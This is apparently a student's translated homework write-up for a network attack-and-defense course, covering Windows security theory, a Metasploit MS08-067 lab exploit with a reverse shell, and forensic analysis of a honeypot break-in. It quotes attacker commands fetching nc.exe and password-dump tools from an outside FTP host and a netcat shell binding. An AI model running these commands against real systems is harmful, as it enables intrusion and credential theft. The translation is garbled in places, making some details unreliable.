"Network Attack and Defense Practice" Week 7 Assignment

20199138 2019-2020-2 "Network Attack and Defense Practice" Week 7 Assignment

Which course does this assignment belong to	https://edu.cnblogs.com/campus/besti/19attackdefense
What are the requirements for this assignment	https://edu.cnblogs.com/campus/besti/19attackdefense/homework/10612
The goal of this assignment is	Learn Windows OS security attack and defense
Homework	as follows

1. Practice content

1.1 Basic Framework of Windows Operating System

It is divided into an operating system kernel running in the privileged mode of the processor, and user space code running in the unprivileged mode of the processor.

• Kernel mode: Windows executive body, Windows kernel body, device driver, hardware abstraction layer, Windows window and graphical interface interface kernel implementation code.

• User mode: system support process, environmental subsystem service process, service process, user application software, core subsystem DLL.
  

• Windows process and thread management mechanism: The process is regarded as a container when the executable program runs in the Windows system. The thread is used as a specific carrier for instruction execution in the Windows system.

• Windows memory management mechanism: Virtual memory is divided into system core memory interval and user memory interval. User mode programs cannot directly access the former.

• Windows file management mechanism: NTFS file system is adopted, and the executable file is in PE format.

• Windows registry management mechanism: It is a storage warehouse for system global configuration, user and application software configuration information.

• Windows network mechanism: network card hardware device driver, NDIS library and miniport driver, TDI, network API DLL and TDI client, network application and service process.
  

1.2 Security architecture and mechanism of Windows operating system

• Windows security architecture: The SRM security reference monitor in the kernel and the LSASS security service in user mode, together with services such as Winlogon / Netlogon and Eventlog, implement the identity authentication mechanism for the subject user and the access control mechanism for all resource objects , And the security audit mechanism for access.
• Windows identity authentication mechanism: Windows sets the account as the execution environment of the security subject to run the program code. The fundamental role of the account authority is to restrict the access of the program running in the account to system resource objects. Windows supports both local identity authentication and network identity authentication.
• Windows authorization and access control mechanism: Based on the reference monitor model, the SRM module in the kernel and the user-mode LSASS service are implemented together, and SRM is used as an intermediary when the security subject accesses the target resource, and authorized access is performed according to the set access control list .
• Windows security audit mechanism: The system audit strategy is defined by the system administrator in the local security strategy to determine the system to record those practices.
• Other security mechanisms: Windows Security Center, IPsec loading and verification mechanism, EPS encrypted file system, file protection mechanism, privacy protection provided by the bundled IE browser and browser security protection mechanism, etc.
  

1.3 Windows remote security attack and defense technology

Including remote password guessing and cracking attacks, Windows network service attacks, Windows client and user attacks.

(1) Penetration test attack process for specific targets:

• Vulnerability scan test: scan test on the target system to discover whether there are known security vulnerabilities in the system.
• Find the penetration code of the vulnerability: According to the index information in the security vulnerability information database, find the attack code resources for the security vulnerabilities that have been scanned in the security community.
• Implement penetration testing: After finding the penetration code, you can implement a penetration attack. But success depends on whether the code and target environment match.
• Metasploit penetration testing: metasploit contains exploits module that exploits security vulnerabilities, auxiliary module that is responsible for scanning and enumeration, payload module that is responsible for implanting shellcode (code executed by software vulnerabilities) in the target system, module that can avoid detection of encoders, and attacks Nops and other modules filled with loads and various interfaces.

(2) Remote password guessing and cracking attacks:

• Remote password guessing: Network services SMB protocol, WMI service, TS remote desktop terminal service, MS SQL database service, SharePoint, etc. that often suffer from such attacks.
• Remote password exchange communication eavesdropping and cracking: Windows needs to exchange information on the Internet when verifying the identity of network users, so it can be cracked by eavesdropping network password exchange communication.
• Remote penetration attack prevention measures: software patches should be updated as soon as possible; during the time that security vulnerabilities are announced, access to existing network services should be temporarily disabled to avoid being attacked; known vulnerabilities are promptly monitored through vulnerability scanning software repair.

1.4 Windows local security attack and defense technology

• Windows local privilege escalation: After the
  attacker obtains the restricted user rights on the system, he will focus on obtaining the ultimate privilege, the main ways are DDL injection and cracking local program vulnerabilities.

• Windows sensitive information theft:
  Windows system password ciphertext extraction technology, windows system password word cracking technology, user sensitive information theft, etc.
  Precautions: Choose high-strength, high-defense passwords, use more secure encrypted plaintext algorithms, and securely configure policies.

• Windows disappears and disappears:
  cover the intrusion by closing the audit function and clearing the event log.
  Precautions: Set up system audits and network service audits in advance, and log records on a non-erasable CDROM.

• Windows remote control and backdoor programs:
  Use command line remote control tools, graphical remote control tools, etc. to implant remote control and backdoor programs in the system to maintain permanent control of the host.
  Preventive measures: backdoor detection software, anti-software, rootkitrerealer, IcSword.

2. Practice process

2.1 Hands-on practice: Metasploit Windows Attack

Task: Use Metasploit software to conduct Windows remote penetration attack experiments, and use Windows Attacker / BT4 attack machine to attempt a remote penetration attack on MS08-067 vulnerability on Windows Metasploitable target machine to obtain access to the target host.

Host	IP address
Kali attack aircraft	193.168.200.2
Win2KServer target machine	193.168.200.124

1. Enter msfconsole in kali to enter Metasploit
   
2. To view detailed information of vulnerability ms08_067, enter search ms08_067; to view attackable payload, enter show payloads
3. Use MS03-026 as the target vulnerability of our attack, enter use exploit / windows / smb / ms08_067_netapi to
   set the load to open the reverse connection, enter set PAYLOAD generic / shell_reverse_tcp
   payload is divided into single, stager, stage, payload is used to actually The code for what to do, exploit is the delivery system.
   Set the Kali attack machine IP address, enter set LHOST 192.168.200.2, set the Win2K target machine IP address, enter set RHOST 192.168.200.124
   
4. Start the attack, enter exploit
   
5. Enter meterpreter and return to indicate that the attack was successful. Run a shell command to enter the system command line interface of the target machine. Enter ipconfig to display the target machine's operating system and IP configuration. The penetration attack is successful;
   
   5. Verify, return to the root directory to create the file ABC , You can see that the root directory successfully created the file ABC
   

2.2 Practice of forensic analysis: decoding a successful NT system cracking attack

An attacker from 213.116.251.162 successfully captured a honeypot host 172.16.1.106 (host name: lab.wiretrip.net) deployed by rfp, extracting and analyzing the entire process of the attack.

1. What cracking tools did the attacker use to attack?

1. Use wireshark to open the log file, filter the data, and enter ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106 according to the title. It is found that the attacker initially made HTTP access.
   
2. Continue to look down and find that the number 117, the attacker opened the system startup file boot.ini, and there are many% C0% AF characters, which are the Unicode encoding of /, which may be a Unicode vulnerability attack.
   
3. Continue to observe that the numbers 130 and 140 contain msadc, which is the process of detection, and then track the tcp flow at number 149, and find that it is a SQL injection attack (select * from customers where).
   The command executed is cmd / c echo werd >> c: \ fun. It can be determined that it is a vulnerability attack based on MSADCS RDS.
   
   

2. How did the attacker use this cracking tool to enter and control the system?
Enter ip.src == 213.116.251.162 && ip.dst == 172.16.1.106 && http.request.method == "POST" in Wireshark to filter, trace the TCP flow in sequence, and sort out the following commands.

cmd /c echo hacker 2000 >> ftpcom” ) ;
cmd /c echo get samdump .dll >> ftpcom” ) ;
cmd /c echo get pdump .exe >> ftpcom” ) ;
cmd /c echo get nc.exe>>ftpcom” ) |;
cmd /c echo quit>>ftpcom” );
cmd /c ftp – s : ftpcom- n www.nether.net” )

Number 179 track TCP streams, see cmd / c echo user johna2k> ftpcom command, the attacker creates a ftpcom script

number 299 track TCP streams, the attacker tries to connect ftp server was not successful

numbered 1106 to track TCP streams, successfully connect ftp

Number 1224 To trace the TCP flow, the attacker enters the command cmd1.exe / c nc -l -p 6969 -e cmd1.exe. It means that the attacker connected to port 6969 and gained access rights. At this point, the attacker has entered the system and gained access.

3. What did the attacker do after gaining access to the system?

1. Enter tcp.port == 6969 and trace the TCP flow to discover the attacker's behavior
   
2. The attacker tried to collect information, net session (list session), but did not have permission, and then returned to the host list. The
   
   attacker sent an echo message to the C drive root directory file README.NOW.Hax0r
   
   attacker sent a net group to view the group of users , Net localgroup view the local group users, net group domain admins, but all failed. The
   
   attacker started looking for the msadc directory and executed pdump to crack the password ciphertext, all failed. The
   
   
   attacker began to delete samdump and pdump
   
   ... the
   attacker left
   

4. How can we prevent such attacks?

• Disable services such as unneeded RDS.
• The firewall blocks connections initiated by servers inside the network.
• Set the virtual root directory on a separate file volume for the web server.
• Use the NTFS file system to reduce the use of FAT that does not provide security features.

5. Do you think the attacker is alert that his target is a honeypot host? If yes, why?
Yes, praise left by the attacker

2.3 Team confrontation practice: Windows system remote penetration attack and analysis

task:

Attacker: Use metasploit to select vulnerabilities in metasploitable for penetration attacks to gain control;
Defense: Use tcpdump / wireshark / snort to monitor and obtain network attack packet files, and combine wireshark / snort to analyze the attack process to obtain the attacker's IP Address, target IP and port, attack initiation time, attack exploit vulnerability, attack using shellcode, and command input executed locally after the attack is successful.

It is the same as the content of experiment one, no more details, only analysis with wireshark.
Open wireshark to monitor, enter exploit to attack.
ip.addr == 192.168.200.124 && ip.addr == 192.168.200.2

The following results can be obtained:
source address 192.168.200.2; target address 192.168.200.124;
source port 4444; target port 445;
attack initiation time: starting from the first ARP request;
vulnerability exploited by the attack: vulnerability in SMB network service, from RemoteActivation Can be seen in the exploited RDP vulnerability

3. Problems encountered in learning and solutions

• Question 1: I just started to practice the two NT system to crack the attack, I feel a bit obscure
• Problem 1 solution: read books and refer to classmates blog

4. Practice summary

There are too many things, so I will do my homework early next time!

References

• "Metasploit Invades Windows"
• "Analysis of Common Vulnerabilities in Windows System"
• "MS08-067 vulnerability principle and detailed analysis process"